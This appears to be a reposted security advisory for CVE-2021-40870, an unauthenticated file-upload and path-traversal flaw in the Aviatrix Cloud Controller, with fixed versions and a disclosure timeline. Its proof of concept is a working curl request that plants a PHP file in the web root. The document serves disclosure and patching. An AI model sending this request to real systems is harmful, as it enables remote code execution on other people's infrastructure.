CVE-2021-40870的POC

admin 2021年10月12日16:45:50评论365 views字数 1300阅读4分20秒阅读模式

Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code

Overview

While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.

Proof of concept

  1. Make the following request to the Aviatrix Cloud Controller aviatrix:

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
  1. Visit https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.

Mitigation/further actions

Upgrade to one of the following versions:

  • UserConnect-6.2-1804.2043 or later

  • UserConnect-6.3-1804.2490 or later

  • UserConnect-6.4-1804.2838 or later

  • UserConnect-6.5-1804.1922 or later

Advisory timeline

  1. 2021-05-12: Discovered

  2. 2021-08-24: Reported to Aviatrix security team

  3. 2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release

  4. 2021-09-11: Fix released

  5. 2021-09-12: CVE requested

  6. 2021-09-13: CVE allocated

https://github.com/0xAgun/CVE-2021-40870

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40870.yaml


原文始发于微信公众号(无级安全):CVE-2021-40870|POC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月12日16:45:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-40870的POChttp://cn-sec.com/archives/578215.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息